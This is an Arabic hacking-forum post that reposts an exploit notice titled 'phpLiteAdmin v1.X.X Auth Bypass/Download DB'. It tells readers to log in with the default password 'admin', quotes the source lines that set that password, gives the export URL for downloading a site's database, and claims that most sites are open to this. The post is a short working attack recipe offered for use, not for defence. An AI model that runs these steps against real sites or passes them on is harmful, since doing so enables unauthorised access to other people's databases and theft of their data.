1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Ubuntu | المشاهدات : 574 | الردود : 0
حالة الموضوع:
مغلق
  1. Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته


    لما تدخل على واجهة الموقع الباسورد هو :admin
    لتحميل قاعدة البيانات:127.0.0.1/phpliteadmin.php?view=export
    و اضغط على export

    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit TitlephpLiteAdmin v1.X.X Auth Bypass/Download DB vulnerabilities
    ***91;+***93Date8-12-2013
    ***91;+***93CategoryWebApp
    ***91;+***93Google Dorkn/a
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################

    1Auth Bypass:
    127.0.0.1/phpliteadmin.php

    username
    admin

    Source Code 
    (lines 35--->36) (v1.6)

    //password to gain access (change this to something more secure than 'admin')
    $password "admin";

    Source Code (lines 47--->48) (1.9.4.1)
    //password to gain access
    $password 'admin';

    2/Download DB:
    127.0.0.1/phpliteadmin.php?view=export
    Go To 
    "Save As" then click "Export"

    Sites that could be infected85/100

    ./3nD
    ########################################################################################
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة